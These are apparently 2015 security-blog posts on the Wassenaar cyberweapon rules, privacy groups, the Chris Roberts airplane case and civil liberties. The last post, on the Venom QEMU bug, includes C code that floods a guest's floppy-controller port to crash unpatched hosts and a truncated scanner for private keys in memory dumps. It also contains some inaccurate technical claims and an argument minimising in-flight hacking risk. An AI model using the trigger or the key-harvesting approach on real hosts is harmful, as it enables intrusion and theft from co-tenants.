Wednesday, May 27, 2015

Some notes about Wassenaar

So #wassenaar has infected your timeline for the past several days. I thought I'd explain what the big deal is.

What's a Wassenaar?


It's a town in the Netherlands where in 1996 an arms control agreement was established; a total of 41 nations now participate. The name of the agreement, the Wassenaar Arrangement, comes from the town. The US, Europe, and Russia are part of the agreement; Africa, the Middle East, and China are not.

The primary goal of the arrangement is anti-proliferation, stopping uranium enrichment and chemical weapons precursors. Another goal is to control conventional weapons, keeping them out of the hands of regimes that would use them against their own people, or to invade their neighbors.

Historically in cybersec, we've complained that Wassenaar classifies crypto as a munition. The point of that control is to keep strong crypto out of non-member countries, so that the NSA can eavesdrop on and decrypt messages there. This does little to stop dictators from getting their hands on strong crypto, but does a lot to prevent dissidents in those countries from encrypting their messages. Perhaps more importantly, it requires us to jump through a lot of bureaucratic hoops to export computer products, because encryption is built into virtually everything.

Why has this become important recently?


In December 2013, Wassenaar added cyberweapons to the list. On May 20th, the United States Bureau of Industry and Security (BIS) proposed US rules to comply with the Wassenaar additions. The BIS is currently accepting comments on these rules.

The proposed BIS rules go beyond the simpler Wassenaar rules, affecting a large number of cybersecurity products and much cybersecurity research. These rules further restrict anything that may be used to develop a cyberweapon, which makes a wide range of innocuous products export-restricted, such as editors and compilers.

It's not that these rules will necessarily block the export of legitimate products, but that they create a huge bureaucracy that will apply the rules prejudicially and arbitrarily. It's easy to make a mistake -- and a mistake can cost a person 20 years in jail and a $1 million fine. This will create a huge chilling effect, even among those who don't intend to export anything.

What specific cyber-weapons is Wassenaar trying to restrict?


The arrangement added three categories of cyber-weapons.

The first is "intrusion malware". The specific example is malware sold by FinFisher to governments like Bahrain, which has been found on the laptops of Bahraini activists living in Washington, D.C.

The second is "intrusion exploits". These are tools, including what's known as "0-days", that exploit a bug or vulnerability in software in order to hack into a computer, usually without human intervention.

The third is "IP surveillance" products. These are tools, like those sold by Amesys, that monitor Internet backbones in a country, spy on citizens' activities, and try to discover everyone activists/dissidents talk to.

Wassenaar includes both intrusion malware and intrusion exploits under the single designation "intrusion software", but while the two are related, they are significantly different from each other. The BIS rules spell out this difference in more detail.

Haven't I heard about 0-days/zero-days before?


The bulk of cyber-security research is into vulnerabilities, which are software bugs that hackers can exploit in order to break into computers. Over the last 15 years, the relentless pursuit of these vulnerabilities has made computers dramatically safer.

When such bugs are first discovered, before anybody else knows about them, they are known as 0-days. Almost always, researchers give those 0-days to the appropriate company so that they can fix the bug.

Sometimes, however, a researcher may sell the 0-day to the NSA, so that they can secretly hack into computers using a bug nobody knows about. Selling 0-days has been a big controversy in the community, especially since the Snowden affair.

It's perfectly legal for American researchers to sell 0-days to the Chinese government instead of the NSA -- which would presumably then use them to hack American computers. One goal of the Wassenaar agreement is to close this obvious loophole.

One of the controversial provisions of the export license is that companies/individuals may have to share their secret 0-days with the NSA in order to get a license.

Isn't stopping intrusion and surveillance software a good thing?


Maybe. Certainly companies like FinFisher and Amesys are evil, knowingly selling to corrupt governments that repress their people.

However, good and evil products are often indistinguishable from each other. The best way to secure your stuff is for you to attack yourself.

That means things like bug bounties that encourage people to find 0-days in your software, so that you can fix them before hackers (or the NSA) exploit them. That means scanning tools that hunt for any exploitable conditions in your computers, to find those bugs before hackers do. Likewise, companies use surveillance tools on their own networks (like intrusion prevention systems) to monitor activity and find hackers.

Thus, while Wassenaar targets evil products, it inadvertently catches the bulk of defensive products in its rules as well.

Isn't stopping intrusion and surveillance software a good thing? (part 2)


Maybe. Here's the thing, though: cyberspace has no borders.

Normal arms control works because weapons are physical things. They require a huge industrial base to produce. Not only the weapons themselves, but the equipment and materials used to produce them, can be tracked. Even if the bad guys sneak through the original weapons, they will still struggle to keep smuggling the parts needed to keep them working.

None of this argument applies to cyberspace. A single hacker working out of their mom's basement can create the next devastating 0-day. Right now, e-commerce sites block the IP addresses from restricted countries. But, those countries can simply call up their ambassador in an unblocked country in order to purchase a product.

That's not to say export controls would have no leverage. For example, these products usually require an abnormally high degree of training and technical support, which can be tracked. However, the little good export controls provide is probably outweighed by the harm -- such as preventing dissidents in the affected countries from being able to defend themselves. We know they do little good now because we watch Bashar al-Assad brandish the latest iPhone that his wife picked up in Paris. Such restrictions may stop the little people in his country from getting things -- but they won't stop him.

Isn't there an exception for open-source?


Yes and no. Wassenaar explicitly exempts open-source code in theory. That means you can publish your code to GitHub knowing that corrupt governments will use it, without getting in trouble with the law.

However, there are situations where this doesn't apply. When security researchers discover a 0-day, they typically write a proof-of-concept exploit, then present their findings at the next conference. That means they have unpublished code on their laptops, code that they may make public later, but which is not yet technically open-source. If they travel outside the country, they have technically violated the letter of the export restrictions, if not the spirit, and can go to jail for 20 years and be forced to pay a $1 million fine.

Thus, make sure you always commit your latest changes to GitHub before getting on a plane.

What's the deal with security research?


One of the most vocal groups in opposition to Wassenaar is security researchers. That's because they are under attack by a wide variety of proposals in the current administration's "War on Hackers".

Proposed changes to the anti-hacking law, the CFAA, would technically make security research into 0days illegal. Copyright law, the DMCA, is frequently exploited for the non-copyright purpose of suppressing researchers. The recent State of Emergency declaration would allow the government to unilaterally seize a security researcher's assets if the government believed they helped Chinese hackers. And lastly, these proposed BIS rules would impose export restrictions on all security research.

Discovering vulnerabilities in products, especially products from prickly companies like Oracle and Microsoft, embarrasses them. They see the security researchers, rather than the hackers, as their primary threat. They put a lot of pressure on government to do something about those pesky researchers.

What's the penalty for improperly exporting something?


Nobody knows, because the BIS gets to arbitrarily impose penalties. They could decide to send you a warning letter, or they could decide to send you to jail for 20 years with a $1 million fine. It's described somewhat here.

It seems good that the BIS can decide to simply warn you if you make a mistake, but the opposite is true. Such warnings go to people who play along, such as by sharing their 0-days with the NSA. Harsher punishments go to those who stand up against the system.

That's been a frequent criticism of anti-hacking laws: their punishments are unreasonably severe, and meted out in a prejudicial and arbitrary fashion. Those who annoy the powerful are the ones who get punished most.

Why this anger toward privacy groups?


Because they got precisely what they asked for.

Privacy groups have long attacked companies like FinFisher and Amesys. They have pushed for regulations to stop these companies, sometimes explicitly for export restrictions. Now that these regulations are here, and their impact obvious, these privacy activists are complaining the rules go too far -- and that they aren't responsible.

But cybersecurity experts have long warned of this, specifically that good and bad products are technically indistinguishable. Privacy groups have ignored these warnings. A good example is this post from Privacy International where they consider, then reject, the warning.

The feuding between privacy/rights organizations and cybersecurity researchers predates the Wassenaar debate. For example, Chris Soghoian, the Principal Technologist at the ACLU, calls 0-day sellers "merchants of death". 0-day sellers in turn call Soghoian a "fascist" for his attack on their free speech rights.

Smarter organizations like the EFF have consistently warned that technical distinctions in regulations are nearly impossible. However, they have still championed the cause that "something must be done" about FinFisher and Amesys, without taking a principled stand against government regulation -- at least not the same stand as cybersecurity researchers.

Are there other issues besides cybersecurity?


Yes. For example, only software used by corrupt governments is controlled. Software used to enforce copyright, or to track users for advertising, is explicitly allowed. Likewise, far from restricting software that the NSA can use to spy on people, one of the provisions suggests that the NSA should get a copy of the source code before an export license will be granted.

There are a couple of First Amendment issues. Code is speech, and in many ways this restricts code (though open-source code is untouched by the rules). Separately, the way restrictions and punishments can be arbitrarily applied gives the government leeway to punish those who speak up.

Conclusion


The BIS proposal is not yet fixed in stone. The comment period ends July 20. You can submit comments here.

One thing to note is that the comments we want to make don't precisely match up with the questions they are asking. For example, they ask "How many additional license applications would your company be required to submit per year?" This has nothing to do with why people are up in arms over this proposal.

Tuesday, May 26, 2015

EFF and intrusion software regulation

To its credit, the EFF is better than a lot of other privacy groups like the ACLU or Privacy International. It at least acknowledges that regulating "evil" software can have unintended consequences on "good" software, that preventing corrupt governments from buying software also means blocking their dissidents from buying software to protect themselves. An example is this piece from several years ago that says:
"First and foremost, we want to make sure we do not leave activists with fewer tools than they already have. Parliament must be mindful of legislation just based on types of technology because broadly written regulations could have a net negative effect on the availability of many general-purpose technologies and could easily harm very people that the regulations are trying to protect."
But that does not stop the EFF from proposing such regulations.

In that same piece, the EFF first proposes rules for transparency. This will not stop the bad companies, but will be a burden on the legitimate companies that have no interest in dealing with corrupt governments anyway. Most of this stuff is sold by small companies, like FinFisher, who focus on the "corrupt regime" market. They would not be embarrassed by transparency -- indeed, it would just serve as advertising. These pieces outing FinFisher, Amesys, Area SpA, and Trovicor are essentially advertisements that help their business.

The EFF next proposes "know your customer" rules. This is so burdensome as to effectively be a ban. Products are sold through middlemen, through distributors and resellers. Companies wish they could know their customers, because they'd like to cut out the middleman. But at the same time, the middleman provides access to markets they could not otherwise touch. A know-your-customer requirement would break most companies' marketing and sales channels.

There's no satisfactory way to know a customer. If a small ISP in one of those countries wants to buy my "intrusion prevention" product, in order to defend against intrusion from their own government or the NSA, there is no way I can sell it to them. Intrusion prevention products do deep-packet inspection that is indistinguishable from what surveillance products do. There is no way the ISP can prove to me that they aren't a front for a government agency that wants to buy my product for surveillance.

The EFF says knowing customers is easy, because companies already have to do it for the Foreign Corrupt Practices Act. This is a misunderstanding -- companies largely bypass that Act by selling through middlemen. India is a huge but corrupt market. Everyone sells products to India. Nobody does it directly, though, because large sales always require bribes. Therefore, they sell through middlemen, washing their hands of corrupt practices. Companies don't always do this intentionally -- if they write off a country because it's too corrupt, some middleman somewhere will buy the product and import it into that country anyway. (This has happened to me -- I scan the entire Internet and sometimes find my own product in countries that aren't supposed to have it.)


The point is that the EFF does not stand for the principle that such regulations are bad. Instead, they stand for the principle that there should be proper regulation. This is like getting only a little bit pregnant -- it's not realistic. The EFF is at least better than other privacy organizations, but it's still far from ideal. The EFF's call for regulation is at least partly responsible for the bad regulations that we get.


Monday, May 25, 2015

This is how we get ants

Today's Wassenaar proposal to limit 0days -- and thereby virtually all cybersecurity products -- is partly the result of lobbying by the ACLU and EFF. The principal technologist of the ACLU called 0day sellers "merchants of death". The EFF called for 0day sales to governments to be the center of any policy debate on cybersecurity.

Yet, they deny responsibility for Wassenaar -- because the regulations go too far, and appear to restrict virtually all cybersecurity software and any free-speech on the topic. These groups now back off and claim they never called for 0day restrictions in the first place.

For example, when the EFF said "exploit sales should be key point in cybersecurity debate", nowhere in the article does it explicitly call for a ban on exploit sales. Their focus was on limiting the actions of the NSA in buying exploits, not so much on those who would sell the exploits.

This is true, but only technically. There's no conceivable situation where the US Government would unilaterally disarm itself of cyberweapons while allowing everyone else to purchase them. It's also not conceivable that, when you've put that much work into calling 0days evil and unethical, a reasonable person wouldn't interpret this as a call to ban them. If you say the issue of governments (plural, not just the US) buying 0days should be at the center of policy debates, that means Wassenaar -- the primary international arrangement for arms control.

But more importantly, the EFF never clarified its remarks. After the EFF published the document, the cybersecurity community quickly responded. Critics pointed out that the EFF was implicitly calling for a ban on 0day. The EFF responded by pointing out the technicality that their call for regulation wasn't explicit. They did not respond by publishing a document explicitly supporting 0day.

That's likely to continue to be the case. The EFF is going to publish a response to the US Wassenaar proposals. While the EFF may point out that Wassenaar goes too far, the EFF is unlikely to defend the rights of 0day coders. The EFF may tacitly agree that proper 0day restrictions are a good thing -- just deny that the currently proposed restrictions are proper.

The debate between researchers and the EFF/ACLU has raged for three years now. The EFF/ACLU can end this debate at any time by publishing an official document in support of 0day research. Until that happens, the only reasonable way to interpret their position (as demonstrated in the above link) is that they want 0day bans.

I point this out because this is how you get totalitarianism. Strident populism leads to regulation. Each one looks good when viewed in isolation, but there are always unexpected consequences. Populists deny they are responsible for those unintended consequences -- but they are. 0days are just speech and standard cybersecurity practice. There's no way to split the baby, to separate out the bad stuff you want to prevent without also limiting good speech and good cybersecurity products. The current attempt by the EFF to split the baby just won't work. If the EFF were serious about principle instead of populism, the only tenable position is absolute support for free speech, coders' rights, and cybersecurity research -- and thus absolute support for 0day.


Saturday, May 16, 2015

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.


As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that on the subject of taking control of a plane, it was in fact a simulator, not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbade audio/visual recording of interviews, preferring instead to take notes. This enshrines any misunderstandings into the official record. The FBI has long abused this, such as for threatening people into informing on friends. It is unlikely the FBI had the technical understanding to grasp what Chris Roberts said. It's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one sided that it rarely gets that far. Instead, merely the threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convicts people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words be used against them, can do little to defend themselves. It's like the Matt DeHart case, where the FBI alleges child pornography. But when you look into the details, it's nothing of the sort. The mere taint of this makes people run from supporting DeHart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.



P.S. Alex Stamos is awesome, don't let my bitch slapping of him make you believe otherwise.

Friday, May 15, 2015

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy has been to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who will yank the collar of a drug sniffing dog in order to "trigger" on drugs so that they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store, instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents near the home are the leading cause of death for children. Driving to the store is vastly more dangerous than leaving the kids at home, so you've priced that danger at around $10.
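
To make that arithmetic explicit (the numbers here are made up purely for illustration): suppose the extra car trip adds roughly a one-in-a-million chance of a fatal accident for the child. If you accept that risk rather than pay the $10 babysitter, you've implicitly said the risk is worth less than $10 -- which works out to valuing a statistical life at no more than $10 / 0.000001, or about $10 million. The exact numbers don't matter; the point is that there is a number.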

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that airline passenger lives are worth more than AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs is worse, and when revealed by whistleblowers, nothing bad happens.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on-board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of achieving it than the current official policies of keeping everything secret. The supposed "unthinkable" option of a live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measured the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity, that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoffs's Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short-term cost to releasing vulns in Adobe Flash, because hackers will use them. But the long-term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our belief in Kerckhoffs's Principle is wrong.


Each year, people die (or get permanently damaged) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines outweigh the dangers by something like a million to one. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact that the rest of us put our children through danger in order to protect their own. We should apply that same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do the math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

Thursday, May 14, 2015

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution, the Bill of Rights, or Supreme Court decisions. They come from the Declaration of Independence, the "natural rights" assertion, but also things like the following phrase used to justify the colonies' revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because speech is a good thing, but because it's the sort of thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance have led to numerous protests around the country. If filming the police were illegal in the United States, this would be a usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because since this information is shared with a third party, the company you are doing business with, you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, yet we still want them to be "private". We struggle with how that third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't think precedent guides us, not Katz, not Smith v. Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- and I don't think that is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus, government has the authority to enforce backdoors. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all data from their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny that their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs have led to an alarming number of intolerable despotic usurpations. If you lawyer people believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

Wednesday, May 13, 2015

NSA: ad hominem is still a fallacy

An ad hominem attack is where, instead of refuting a person's arguments, you attack their character. It's a fallacy that enlightened people avoid. I point this out because of a piece in The Intercept about how some of the NSA's defenders have financial ties to the NSA. This is a fallacy.


The first rule of NSA club is don't talk about NSA club. The intelligence community frequently publishes rules to this effect to all their employees, contractors, and anybody else under their thumb. They don't want their people talking about the NSA, even in defense. Their preferred defense is lobbying politicians privately in back rooms. They hate having things out in the public. Or, when they do want something public, they want to control the messaging (they are control freaks). They don't want their supporters muddying the waters with conflicting messaging, even if it is all positive. What they fear most is bad supporters, the type that does more harm than good. Inevitably, some defender of the NSA is going to say "ragheads must die", and that'll be the one thing attackers will cherry pick to smear the NSA's reputation.

Thus, you can tell how close somebody is to the NSA by how much they talk about the NSA -- the closer to the NSA they are, the less they talk about it. That's how you know that I'm mostly an outsider -- if I actually had the close ties to the NSA that some people think I do, then I couldn't publish this blogpost.

Note that there are a few cases where this might not apply, like Michael Hayden (former head) and Stewart Baker (former chief lawyer). Presumably, these guys have such close ties with insiders that they can coordinate messaging. But they are exceptions, not the rule.


The idea of "conflict of interest" is a fallacy because it works both ways. You'd expect employees of the NSA to like the NSA. But at the same time, you'd expect that those who like the NSA would also seek a job at the NSA. Thus, it's likely they sincerely like the NSA, and not just because they are paid to do so.

This applies even to Edward Snowden himself. In an interview, he said of the NSA, "These are good people trying to do hard work for good reasons". He went to work for the intelligence community because he believed in their mission, that they were good people. He leaked the information because he felt the NSA overstepped its bounds, not because the mission of spying for your country was wrong.

If the "conflict of interest" fallacy were correct, then it would apply to The Intercept as well, whose entire purpose is to fan the flames of outrage over the NSA. If the conflict of interest about NSA contractors is a matter of public concern, then so is the amount Glenn Greenwald is getting paid for his stash of Snowden secrets, and how much Snowden gets paid living in Russia.

The reality is this. Those who attack the NSA, like The Intercept, are probably sincere in their attacks. Likewise, those who defend the NSA are likely sincere in their defense.


As the book To Kill a Mockingbird said, you don't truly know somebody until you've walked a mile in their shoes. Many defend the NSA simply because they've walked a mile in the NSA's shoes. I say this from my own personal perspective. True, I often attack the NSA, because I agree with Snowden that surveillance has gone too far. But at the same time, again like Snowden, I feel they've been unfairly demonized -- because I've seen them up close and personal. In the intelligence community, it's the NSA who takes civil rights seriously, and it's organizations like the DEA, ATF, and FBI that'll readily stomp on your rights. We should be hating these other organizations more than the NSA.

It's those like The Intercept who are the questionable bigots here. They make no attempt to see things from another point of view. As a technical expert, I know their stories based on Snowden leaks are often bunk -- exploited to trigger rage with little interest in understanding the truth.


Stewart Baker and Michael Hayden are fascist pieces of crap who want a police state. That doesn't mean their arguments are always invalid, though. They know a lot about the NSA. They are worth considering, even if wrong.

Some brief technical notes on Venom

Like you, I was displeased by the lack of details on the "Venom" vulnerability, so I thought I'd write up what little I found.

The patch to the source code is here. Since the note references CVE-2015-3456, we know it's Venom:
http://git.qemu.org/?p=qemu.git;a=commit;h=e907746266721f305d67bc0718795fedee2e824c

Looking up those terms, I find writeups, such as this one from RedHat:
https://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/

It comes down to a typical heap/stack buffer overflow (depending), where the attacker can write large amounts of data past the end of a buffer. Since this is the kernel, there are no protections like NX or ASLR. To exploit this, you'd likely need some knowledge of the host operating system.
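
For those who want the shape of the bug without reading the patch, here's a minimal sketch in C. This is not QEMU's actual code -- the names and the 512-byte size are just illustrative -- but it shows the general pattern: a fixed-size FIFO, an index the guest keeps advancing, a missing bounds check, and a fix that amounts to forcing the index back in bounds (roughly what the real patch does).

/* Illustrative sketch only -- not QEMU's actual code, just the general
 * shape of the bug class behind Venom. */
#include <stdint.h>
#include <stdio.h>

#define FIFO_SIZE 512   /* illustrative; the real FIFO is sector-sized */

struct fdc_state {
    uint8_t fifo[FIFO_SIZE];
    int     data_pos;   /* where the next guest-supplied byte lands */
};

/* Called once per byte the guest writes to the controller's data port. */
static void fdc_write_data_buggy(struct fdc_state *s, uint8_t value)
{
    /* BUG: nothing checks data_pos against FIFO_SIZE, so a guest that
     * keeps writing walks past the end of fifo[] and corrupts whatever
     * the emulator allocated next to it. */
    s->fifo[s->data_pos++] = value;
}

/* The fix amounts to forcing the index back within the buffer. */
static void fdc_write_data_fixed(struct fdc_state *s, uint8_t value)
{
    s->fifo[s->data_pos++ % FIFO_SIZE] = value;
}

int main(void)
{
    struct fdc_state s = { .data_pos = 0 };
    for (int i = 0; i < 10000; i++)      /* far more bytes than FIFO_SIZE */
        fdc_write_data_fixed(&s, 0x41);  /* fixed version stays in bounds */
    (void)fdc_write_data_buggy;          /* buggy version shown, not run  */
    printf("wrote %d bytes into a %d-byte FIFO without overflow\n",
           s.data_pos, FIFO_SIZE);
    return 0;
}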

The details look straightforward, which means a PoC (proof-of-concept exploit) should arrive by tomorrow. (Update: a PoC has arrived today here).

This is a hypervisor privilege escalation bug. To exploit this, you'd sign up with one of the zillions of VPS providers and get a Linux instance. You'd then, likely, replace the floppy driver in the Linux kernel with a custom driver that exploits this bug. You have root access to your own kernel, of course, which you are going to escalate to root access of the hypervisor.
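
To make the mechanics concrete, here's a rough guest-side sketch in C (Linux guest, root required). It is not the published PoC: the command byte 0x8e (the drive-specification command usually cited in the Venom write-ups) and the byte count are my assumptions, and for a simple crash test you don't strictly need a kernel driver, since root can do raw port I/O from userspace. All it really demonstrates is how a guest reaches the emulated controller at all: ordinary port I/O to the FDC data port at 0x3f5.

/* Rough guest-side sketch, not the published PoC. Assumptions: a Linux
 * guest with root, the standard x86 FDC data port at 0x3f5, and that
 * command 0x8e (drive specification) is one of the handlers that fails
 * to reset the FIFO index. On a patched host the writes are kept in
 * bounds and nothing interesting happens. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/io.h>

#define FDC_DATA_PORT 0x3f5

int main(void)
{
    /* Ask the kernel for access to that single I/O port (root only). */
    if (ioperm(FDC_DATA_PORT, 1, 1) != 0) {
        perror("ioperm");
        return EXIT_FAILURE;
    }

    outb(0x8e, FDC_DATA_PORT);           /* select the command ...        */
    for (int i = 0; i < 0x10000; i++)    /* ... then feed it far more     */
        outb(0x41, FDC_DATA_PORT);       /* parameter bytes than the      */
                                         /* emulated FIFO can hold        */

    puts("done (an unpatched host may have just crashed)");
    return EXIT_SUCCESS;
}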

People suggest adding an exploit to toolkits like the Metasploit framework -- but I don't think it has a framework for running drivers. This would instead be more of a one-off.

Once you gained control of the host, you'd then of course gain access to any of the other instances. This would be a perfect bug for the NSA. Bitcoin wallets, RSA private keys, forum passwords, and the like are easily found searching raw memory. Once you've popped the host, reading memory of other hosted virtual machines is undetectable. Assuming the NSA had a program that they'd debugged over the years that looked for such stuff, for $100,000 they could buy a ton of $10 VPS instances around the world, then run the search. All sorts of great information would fall out of such an effort -- you'd probably make your money back from discovered Bitcoin alone.
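
As an aside on how easy that searching is (this is a toy example with a made-up dump file name, not anyone's actual tooling): secrets like PEM-encoded RSA keys carry distinctive markers, so finding candidates in a raw memory image is little more than a string search.

/* Toy illustration: scan a raw memory dump for the marker that
 * PEM-encoded RSA private keys carry. The file name is made up. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "memdump.raw";
    FILE *f = fopen(path, "rb");
    if (!f) { perror(path); return 1; }

    /* Read the whole dump into memory; a real tool would mmap or stream. */
    fseek(f, 0, SEEK_END);
    long len = ftell(f);
    rewind(f);
    char *buf = malloc(len);
    if (!buf || fread(buf, 1, len, f) != (size_t)len) {
        perror("read");
        return 1;
    }
    fclose(f);

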